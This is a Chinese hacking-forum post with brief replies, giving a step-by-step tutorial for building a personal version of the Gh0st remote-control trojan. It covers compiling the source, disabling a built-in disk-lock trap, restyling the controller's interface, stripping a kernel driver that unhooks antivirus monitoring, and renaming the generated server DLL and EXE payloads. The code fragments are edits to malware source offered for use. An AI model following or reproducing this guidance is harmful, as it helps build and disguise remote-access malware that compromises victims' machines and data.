• 2175阅读
  • 4回复

饭客打造个人版Ghost远控 [复制链接]

上一主题 下一主题
离线啊冲
 

只看楼主 倒序阅读 使用道具 楼主  发表于: 2015-10-23

饭客网络

www.hackfans.com.cn

由此动画造成的任何后果和本站无关.

语音教程,请打开音箱或戴上耳麦。

====================================

1.正确编译Ghost远控
2.去除硬盘锁功能
3.界面修改
4.去除驱动文件
5.改文件生成和调用


删除编译后的垃圾文件

@echo   off
del /F /Q /S *.aps *.idb *.ncp *.obj *.pch *.sbr *.tmp *.pdb *.bsc *.ilk *.res *.ncb *.opt *.suo *.manifest *.dep

1.正确编译Ghost远控

安装VC6.0和更新SDK
vc 6.0龙卷风企业版

SDK下载地址:
http://www.namipan.com/d/VC98.rar/184e40de31642ee25251a35e1efcefbdc011226249be0e04

然后解压到vc++安装目录的VC98目录里,覆盖掉原来的文件夹
C:\Program Files\Microsoft Visual Studio\VC98

2.去除硬盘锁
GH0st硬盘锁是源码的作者为了保护版权而设置的,如果我们直接更改版权会造成硬盘被锁
中了硬盘锁的后果是非常严重的,特别是你电脑里有重要数据的时候,这样会导致你电脑里的数据全部丢失!
如果你没去硬盘锁,又改了版权,那么打开Gh0st控制端后会一闪就关闭了
这样就是中硬盘锁了,中了硬盘锁之后将不能重装系统,只能重新对硬盘进行分区。

有两个地方被改了就会触发硬盘锁,我会指给大家看

搜索这句话:
unsigned char scode[] =
再搜索这个:
void CBuildView::OnActivateView(BOOL bActivate, CView* pActivateView, CView* pDeactiveView)
注释掉实现锁硬盘的功能就可以了

3.界面修改

//界面居中显示
this ->CenterWindow(CWnd::GetDesktopWindow());

// 去掉菜单栏
    m_pMainWnd->SetMenu(NULL);

修改选项卡的属性:

在gh0st工程的CMainFrame的OnCreate函数里,return 0之前加上下面的代码:

LOGFONT lf = {13, 0, 0, 0, FW_NORMAL, 0, 0, 0,
  DEFAULT_CHARSET, OUT_CHARACTER_PRECIS, CLIP_CHARACTER_PRECIS,
  DEFAULT_QUALITY, DEFAULT_PITCH | FF_DONTCARE, "宋体"};    //设置字体为宋体
m_wndTab.SetControlFont(lf, TRUE);

改高度:

//CRect(0, 0, 0, 15),   //这个是改高度的
CRect(0, 0, 0, 23),     //改为23

还可以把选项卡的文字改为中文:

Connections ——> 上线主机

//    ((CMainFrame*)AfxGetApp()->m_pMainWnd)->AddView("Connections", this, "Connections Users");
    ((CMainFrame*)AfxGetApp()->m_pMainWnd)->AddView("  上线主机  ", this, "上线主机");



settings    ——> 服务设置

//    ((CMainFrame*)AfxGetApp()->m_pMainWnd)->AddView("Settings", pSettingsView, "Control Settings");
    ((CMainFrame*)AfxGetApp()->m_pMainWnd)->AddView("  服务设置  ", pSettingsView, "服务设置");



build      ——> 生成服务端

//    ((CMainFrame*)AfxGetApp()->m_pMainWnd)->AddView("Build", pBuildView, "Build Server");
    ((CMainFrame*)AfxGetApp()->m_pMainWnd)->AddView("  生成服务端  ", pBuildView, "生成服务端");

4.去除驱动文件
现在利用驱动程序在ring0态恢复SSDT HOOK(钩子),使部分安全软件的主动防御和监控失效的功能已经被很多杀软主动拦截或者驱动文件本身对于杀软已经失效,所以我们得去除掉这个驱动文件了。
去除sys文件无非就是把调用了这个功能的地方注释掉就可以了,然后再去除sys的资源调用,就不会再加载驱动恢复SSDT了

(1).先搜索ResetSSDT,然后把搜索到的全注释掉

(2).注释掉资源调用

IDR_SYS                 BIN     DISCARDABLE     "..\\..\\bin\\ressdt.sys"


(3).删掉Gh0st\Server\svchost\common\resetssdt.h头文件,再注释掉下面这句

//#include "common/resetssdt.h"
然后搜索IDR_SYS,把这句也注释掉就可以了


5. 改文件生成和调用

把dll、exe都改到Bin\update目录里去

原来的生成位置是这样的:
Gh0st\Server\install\res\svchost.dll    这个是生成的dll文件
Gh0st\gh0st\res\install.exe             这个是生成的exe文件

其中svchost files是dll的工程
    install files是exe的工程


dll生成位置:(生成的dll的名称是和dll的输出表dll名称有关的)
../install/res/svchost.dll   //原来的输出表里的dll名称是svchost.dll
../../bin/update/ziying.dll      



exe生成位置:
../../gh0st/res/install.exe  //原来的生成位置
../../bin/update/ziying.dat

改了生成的位置之后还得改资源调用的位置,要不然还是在调用原来位置的dll和exe


dll资源调用:
//IDR_DLL                 BIN     DISCARDABLE     "res\\svchost.dll"
IDR_DLL                 BIN     DISCARDABLE     "..\\..\\bin\\update\\ziying.dll"


exe资源调用:
//IDR_BSS                 BSS     DISCARDABLE     "res\\install.exe"
IDR_BSS                 BSS     DISCARDABLE     "..\\bin\\update\\ziying.dat"

本部分内容设定了隐藏,需要回复后才能看到

本帖提到的人: @echo
善者 慈悲心常在 无怨无恨 以苦为乐
默认压缩密码www.hifyl.com
文件分享密码问题:http://www.hifyl.com/read-htm-tid-4444.html
离线ghban

只看该作者 沙发  发表于: 2015-12-28
学习学习
离线myhuang

只看该作者 板凳  发表于: 2016-04-01
asasfsfdsfdsfgdsgdgfdgfd
你好!
离线w1324296

只看该作者 地板  发表于: 2016-12-19
ewerwerwrw
离线1575586769

只看该作者 4楼 发表于: 04-30
感谢楼主的分享
快速回复
限100 字节
如果您提交过一次失败了,可以用”恢复数据”来恢复帖子内容
 
上一个 下一个